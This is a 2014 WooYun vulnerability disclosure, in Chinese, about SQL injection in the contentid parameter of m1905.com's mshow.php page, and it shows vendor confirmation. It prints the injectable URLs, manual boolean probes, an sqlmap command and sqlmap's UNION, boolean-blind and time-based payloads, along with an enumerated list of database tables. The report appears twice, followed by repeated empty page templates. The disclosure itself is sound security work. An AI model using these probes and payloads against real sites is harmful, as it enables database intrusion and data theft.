m1905.com主站SQL注射可致数据库全部泄漏

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053133

漏洞标题：m1905.com主站SQL注射可致数据库全部泄漏

漏洞作者： lxj616

提交时间：2014-03-08 19:45

修复时间：2014-04-22 19:45

公开时间：2014-04-22 19:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-03-08：细节已通知厂商并且等待厂商处理中
2014-03-14：厂商已经确认，细节仅向厂商公开
2014-03-24：细节向核心白帽子及相关领域专家公开
2014-04-03：细节向普通白帽子公开
2014-04-13：细节向实习白帽子公开
2014-04-22：细节向公众公开

简要描述：

m1905.com 主站SQL注射可致数据库全部泄漏，使用SQLMAP取得数据库表名（仅表名）证明危害，不再继续深入，望尽快确认修补

详细说明：

漏洞位置：

http://www.m1905.com/special/mshow.php?contentid=1109&specialid=356&tpl=freshman_file

先粗略用 and 1=1 和 and 1=2 感性认识一下

http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=1&specialid=356&tpl=freshman_file

http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=2&specialid=356&tpl=freshman_file

然后SQLMAP取得数据库信息（仅演示获取数据表名称，不再继续深入）

C:\Users\Administrator>sqlmap.py -u "www.m1905.com/specia/mshow.php?contentid=1109&specialid=356&tpl=freshman_file" -p contentid --tables

qlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: GET
Parameter: contentid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: contentid=1109 AND 2160=2160&specialid=356&tpl=freshman_file
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: contentid=1109 UNION ALL SELECT CONCAT(0x7179637a71,0x56546d4e704b78764d75,0x7178777671),NULL,NULL#&specialid=356&tpl=freshman_file
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: contentid=1109 AND SLEEP(5)&specialid=356&tpl=freshman_file
---
back-end DBMS: MySQL 5.0.11
Database: ucenter
[1 table]
+---------------------------------------+
| uc_vars                               |
+---------------------------------------+
Database: cms
[273 tables]
+---------------------------------------+
| HdVideoEncode                         |
| cms_admin                             |
| cms_admin_role                        |
| cms_admin_role_priv                   |
| cms_ads                               |
| cms_ads_place                         |
| cms_ads_stat                          |
| cms_announce                          |
| cms_area                              |
| cms_ask                               |
| cms_ask_actor                         |
| cms_ask_credit                        |
| cms_ask_posts                         |
| cms_ask_vote                          |
| cms_attachment                        |
| cms_author                            |
| cms_block                             |
| cms_c_cctv6film                       |
| cms_c_disc                            |
| cms_c_dm                              |
| cms_c_downfile                        |
| cms_c_entertainment                   |
| cms_c_film                            |
| cms_c_film_20100519                   |
| cms_c_filmtable                       |
| cms_c_game                            |
| cms_c_info                            |
| cms_c_ku6video                        |
| cms_c_live                            |
| cms_c_magazine                        |
| cms_c_mainstar                        |
……………………省略好多数据表…………………………
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

漏洞证明：

然后SQLMAP取得数据库信息（仅演示获取数据表名称，不再继续深入）

C:\Users\Administrator>sqlmap.py -u "www.m1905.com/specia/mshow.php?contentid=1109&specialid=356&tpl=freshman_file" -p contentid --tables

qlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: GET
Parameter: contentid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: contentid=1109 AND 2160=2160&specialid=356&tpl=freshman_file
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: contentid=1109 UNION ALL SELECT CONCAT(0x7179637a71,0x56546d4e704b78764d75,0x7178777671),NULL,NULL#&specialid=356&tpl=freshman_file
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: contentid=1109 AND SLEEP(5)&specialid=356&tpl=freshman_file
---
back-end DBMS: MySQL 5.0.11
Database: ucenter
[1 table]
+---------------------------------------+
| uc_vars                               |
+---------------------------------------+
Database: cms
[273 tables]
+---------------------------------------+
| HdVideoEncode                         |
| cms_admin                             |
| cms_admin_role                        |
| cms_admin_role_priv                   |
| cms_ads                               |
| cms_ads_place                         |
| cms_ads_stat                          |
| cms_announce                          |
| cms_area                              |
| cms_ask                               |
| cms_ask_actor                         |
| cms_ask_credit                        |
| cms_ask_posts                         |
| cms_ask_vote                          |
| cms_attachment                        |
| cms_author                            |
| cms_block                             |
| cms_c_cctv6film                       |
| cms_c_disc                            |
| cms_c_dm                              |
| cms_c_downfile                        |
| cms_c_entertainment                   |
| cms_c_film                            |
| cms_c_film_20100519                   |
| cms_c_filmtable                       |
| cms_c_game                            |
| cms_c_info                            |
| cms_c_ku6video                        |
| cms_c_live                            |
| cms_c_magazine                        |
| cms_c_mainstar                        |
……………………省略好多数据表…………………………
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

修复方案：

做参数判断，过滤
望尽快确认漏洞等级，修复网站漏洞

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2014-03-14 13:22

厂商回复：

感谢反馈

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053133

漏洞标题：m1905.com主站SQL注射可致数据库全部泄漏

相关厂商：M1905.COM

漏洞作者： lxj616

提交时间：2014-03-08 19:45

修复时间：2014-04-22 19:45

公开时间：2014-04-22 19:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053133

漏洞标题：m1905.com主站SQL注射可致数据库全部泄漏

相关厂商：M1905.COM

漏洞作者： lxj616

提交时间：2014-03-08 19:45

修复时间：2014-04-22 19:45

公开时间：2014-04-22 19:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-053133"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lxj616@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：